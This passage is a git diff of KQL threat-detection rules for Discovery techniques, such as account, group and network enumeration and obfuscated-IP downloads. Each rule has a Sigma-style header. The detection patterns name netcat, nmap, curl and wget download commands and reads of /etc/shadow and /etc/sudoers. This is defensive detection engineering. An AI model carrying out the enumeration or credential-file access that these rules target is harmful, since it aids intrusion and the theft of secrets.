 | where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or ((FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or (ProcessVersionInfoOriginalFileName in~ ("whoami.exe", "quser.exe", "qwinsta.exe"))) or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine
contains "get") and FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_groups_discovery_linux.kql b/KQL/rules/Discovery/local_groups_discovery_linux.kql
index 36d18147..ee1f4093 100644
--- a/KQL/rules/Discovery/local_groups_discovery_linux.kql
+++ b/KQL/rules/Discovery/local_groups_discovery_linux.kql
@@ -1,12 +1,12 @@
-// Title: Local Groups Discovery - Linux
-// Author: Ömer Günal, Alejandro Ortuno, oscd.community
-// Date: 2020-10-11
-// Level: low
-// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1069.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Local Groups Discovery - Linux
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-10-11
+// Level: low
+// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/groups" or (ProcessCommandLine contains "/etc/group" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_groups_discovery_macos.kql b/KQL/rules/Discovery/local_groups_discovery_macos.kql
index 164d2d7c..22b775cc 100644
--- a/KQL/rules/Discovery/local_groups_discovery_macos.kql
+++ b/KQL/rules/Discovery/local_groups_discovery_macos.kql
@@ -1,12 +1,12 @@
-// Title: Local Groups Discovery - MacOs
-// Author: Ömer Günal, Alejandro Ortuno, oscd.community
-// Date: 2020-10-11
-// Level: informational
-// Description: Detects enumeration of local system groups
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1069.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Local Groups Discovery - MacOs
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-10-11
+// Level: informational
+// Description: Detects enumeration of local system groups
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents | where ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "group") and FolderPath endswith "/dscacheutil") or (ProcessCommandLine contains "/etc/group" and FolderPath endswith "/cat") or ((ProcessCommandLine contains "-list" and ProcessCommandLine contains "/groups") and FolderPath endswith "/dscl")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
index bb4a6fe7..f663ee48 100644
--- a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
@@ -1,13 +1,13 @@
-// Title: Local Groups Reconnaissance Via Wmic.EXE
-// Author: frack113
-// Date: 2021-12-12
-// Level: low
-// Description: Detects the execution of "wmic" with the "group" flag.
-// Adversaries may attempt to find local system groups and permission settings.
-// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
-// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1069.001
-
-DeviceProcessEvents
+// Title: Local Groups Reconnaissance Via Wmic.EXE
+// Author: frack113
+// Date: 2021-12-12
+// Level: low
+// Description: Detects the execution of "wmic" with the "group" flag.
+// Adversaries may attempt to find local system groups and permission settings.
+// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
+// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+
+DeviceProcessEvents | where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql
index fd3026f9..64673cf3 100644
--- a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql
+++ b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql
@@ -1,12 +1,12 @@
-// Title: Local System Accounts Discovery - Linux
-// Author: Alejandro Ortuno, oscd.community, CheraghiMilad
-// Date: 2020-10-08
-// Level: low
-// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Local System Accounts Discovery - Linux
+// Author: Alejandro Ortuno, oscd.community, CheraghiMilad
+// Date: 2020-10-08
+// Level: low
+// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents | where FolderPath endswith "/lastlog" or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/etc/spwd.db" or ProcessCommandLine contains "/etc/pwd.db" or ProcessCommandLine contains "/etc/master.passwd") and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim" or FolderPath endswith "/less" or FolderPath endswith "/emacs" or FolderPath endswith "/sqlite3" or FolderPath endswith "/makemap")) or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql
index e2ff4f81..f1d6c836 100644
--- a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql
+++ b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql
@@ -1,12 +1,12 @@
-// Title: Local System Accounts Discovery - MacOs
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-08
-// Level: low
-// Description: Detects enumeration of local systeam accounts on MacOS
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Local System Accounts Discovery - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-08
+// Level: low
+// Description: Detects enumeration of local systeam accounts on MacOS
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents | where ((ProcessCommandLine contains "list" and ProcessCommandLine contains "/users") and FolderPath endswith "/dscl") or ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "user") and FolderPath endswith "/dscacheutil") or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/sudoers") and FolderPath endswith "/cat") or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/macos_network_service_scanning.kql b/KQL/rules/Discovery/macos_network_service_scanning.kql
index 24d422e1..aa75713e 100644
--- a/KQL/rules/Discovery/macos_network_service_scanning.kql
+++ b/KQL/rules/Discovery/macos_network_service_scanning.kql
@@ -1,12 +1,12 @@
-// Title: MacOS Network Service Scanning
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-21
-// Level: low
-// Description: Detects enumeration of local or remote network services.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: MacOS Network Service Scanning
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-21
+// Level: low
+// Description: Detects enumeration of local or remote network services.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents | where ((FolderPath endswith "/nc" or FolderPath endswith "/netcat") and (not(ProcessCommandLine contains "l"))) or (FolderPath endswith "/nmap" or FolderPath endswith "/telnet")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/macos_remote_system_discovery.kql b/KQL/rules/Discovery/macos_remote_system_discovery.kql
index 375cf900..12724578 100644
--- a/KQL/rules/Discovery/macos_remote_system_discovery.kql
+++ b/KQL/rules/Discovery/macos_remote_system_discovery.kql
@@ -1,12 +1,12 @@
-// Title: Macos Remote System Discovery
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-22
-// Level: informational
-// Description: Detects the enumeration of other remote systems.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1018
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Macos Remote System Discovery
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-22
+// Level: informational
+// Description: Detects the enumeration of other remote systems.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents | where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/network_reconnaissance_activity.kql b/KQL/rules/Discovery/network_reconnaissance_activity.kql
index 109e83da..b036cc04 100644
--- a/KQL/rules/Discovery/network_reconnaissance_activity.kql
+++ b/KQL/rules/Discovery/network_reconnaissance_activity.kql
@@ -1,12 +1,12 @@
-// Title: Network Reconnaissance Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-07
-// Level: high
-// Description: Detects a set of suspicious network related commands often used in recon stages
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceProcessEvents
+// Title: Network Reconnaissance Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects a set of suspicious network related commands often used in recon stages
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents | where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs."
\ No newline at end of file
diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/Discovery/network_sniffing_macos.kql
index 5e3c4ee1..0bcd2c9c 100644
--- a/KQL/rules/Discovery/network_sniffing_macos.kql
+++ b/KQL/rules/Discovery/network_sniffing_macos.kql
@@ -1,13 +1,13 @@
-// Title: Network Sniffing - MacOs
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-14
-// Level: informational
-// Description: Detects the usage of tooling to sniff network traffic.
-// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1040
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Network Sniffing - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-14
+// Level: informational
+// Description: Detects the usage of tooling to sniff network traffic.
+// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents | where FolderPath endswith "/tcpdump" or FolderPath endswith "/tshark"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql
index 9903a25e..95fb2310 100644
--- a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql
+++ b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql
@@ -1,12 +1,12 @@
-// Title: New Network Trace Capture Started Via Netsh.EXE
-// Author: Kutepov Anton, oscd.community
-// Date: 2019-10-24
-// Level: medium
-// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1040
-// False Positives:
-// - Legitimate administration activity
-
-DeviceProcessEvents
+// Title: New Network Trace Capture Started Via Netsh.EXE
+// Author: Kutepov Anton, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents | where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/nltest_exe_execution.kql b/KQL/rules/Discovery/nltest_exe_execution.kql
index 30f4ef74..2f4f7e57 100644
--- a/KQL/rules/Discovery/nltest_exe_execution.kql
+++ b/KQL/rules/Discovery/nltest_exe_execution.kql
@@ -1,12 +1,12 @@
-// Title: Nltest.EXE Execution
-// Author: Arun Chauhan
-// Date: 2023-02-03
-// Level: low
-// Description: Detects nltest commands that can be used for information discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
-// False Positives:
-// - Legitimate administration activity
-
-DeviceProcessEvents
+// Title: Nltest.EXE Execution
+// Author: Arun Chauhan
+// Date: 2023-02-03
+// Level: low
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents | where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/notepad_password_files_discovery.kql b/KQL/rules/Discovery/notepad_password_files_discovery.kql
index 8d0e8b2b..ea16fd51 100644
--- a/KQL/rules/Discovery/notepad_password_files_discovery.kql
+++ b/KQL/rules/Discovery/notepad_password_files_discovery.kql
@@ -1,12 +1,12 @@
-// Title: Notepad Password Files Discovery
-// Author: The DFIR Report
-// Date: 2025-02-21
-// Level: low
-// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-// False Positives:
-// - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further.
-
-DeviceProcessEvents
+// Title: Notepad Password Files Discovery
+// Author: The DFIR Report
+// Date: 2025-02-21
+// Level: low
+// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further.
+
+DeviceProcessEvents | where ((ProcessCommandLine contains "password" and ProcessCommandLine contains ".txt") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".csv") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".doc") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".xls")) and FolderPath endswith "\\notepad.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql
index 8ab99f01..0301a460 100644
--- a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql
+++ b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql
@@ -1,10 +1,10 @@
-// Title: Obfuscated IP Download Activity
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022-08-03
-// Level: medium
-// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
-// MITRE Tactic: Discovery
-// Tags: attack.discovery
-
-DeviceProcessEvents
+// Title: Obfuscated IP Download Activity
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents | where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql
index 17246363..f664129c 100644
--- a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql
+++ b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql
@@ -1,10 +1,10 @@
-// Title: Obfuscated IP Via CLI
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022-08-03
-// Level: medium
-// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
-// MITRE Tactic: Discovery
-// Tags: attack.discovery
-
-DeviceProcessEvents
+// Title: Obfuscated IP Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents | where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
index 752a9f90..b1f77a44 100644
--- a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
+++ b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
@@ -1,10 +1,10 @@
-// Title: OS Architecture Discovery Via Grep
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: low
-// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-
-DeviceProcessEvents
+// Title: OS Architecture Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents | where (ProcessCommandLine endswith "aarch64" or ProcessCommandLine endswith "arm" or ProcessCommandLine endswith "i386" or ProcessCommandLine endswith "i686" or ProcessCommandLine endswith "mips" or ProcessCommandLine endswith "x86_64") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql
index 9d06690e..7ca0e464 100644
--- a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql
+++ b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql
@@ -1,12 +1,12 @@
-// Title: Permission Check Via Accesschk.EXE
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-10-13
-// Level: medium
-// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1069.001
-// False Positives:
-// - System administrator Usage
-
-DeviceProcessEvents
+// Title: Permission Check Via Accesschk.EXE
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents | where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pktmon_exe_execution.kql b/KQL/rules/Discovery/pktmon_exe_execution.kql
index 33b2823c..e4629826 100644
--- a/KQL/rules/Discovery/pktmon_exe_execution.kql
+++ b/KQL/rules/Discovery/pktmon_exe_execution.kql
@@ -1,12 +1,12 @@
-// Title: PktMon.EXE Execution
-// Author: frack113
-// Date: 2022-03-17
-// Level: medium
-// Description: Detects execution of PktMon, a tool that captures network packets.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1040
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: PktMon.EXE Execution
+// Author: frack113
+// Date: 2022-03-17
+// Level: medium
+// Description: Detects execution of PktMon, a tool that captures network packets.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents | where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
index 5b8b9489..28e31d44 100644
--- a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
+++ b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
@@ -1,11 +1,11 @@
-// Title: Pnscan Binary Data Transmission Activity
-// Author: David Burkett (@signalblur)
-// Date: 2024-04-16
-// Level: medium
-// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
-// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046
-
-DeviceProcessEvents
+// Title: Pnscan Binary Data Transmission Activity
+// Author: David Burkett (@signalblur)
+// Date: 2024-04-16
+// Level: medium
+// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
+// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+
+DeviceProcessEvents | where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|"|')"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
index 1e81ff0c..ce8d5c18 100644
--- a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
+++ b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019-10-21
-// Level: medium
-// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1012, attack.t1007
-// False Positives:
-// - Discord
-
-DeviceProcessEvents
+// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.t1007
+// False Positives:
+// - Discord
+
+DeviceProcessEvents | where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql
index edd00674..108b5468 100644
--- a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql
+++ b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql
@@ -1,13 +1,13 @@
-// Title: Potential Container Discovery Via Inodes Listing
-// Author: Seth Hanford
-// Date: 2023-08-23
-// Level: low
-// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate system administrator usage of these commands
-// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
-
-DeviceProcessEvents
+// Title: Potential Container Discovery Via Inodes Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
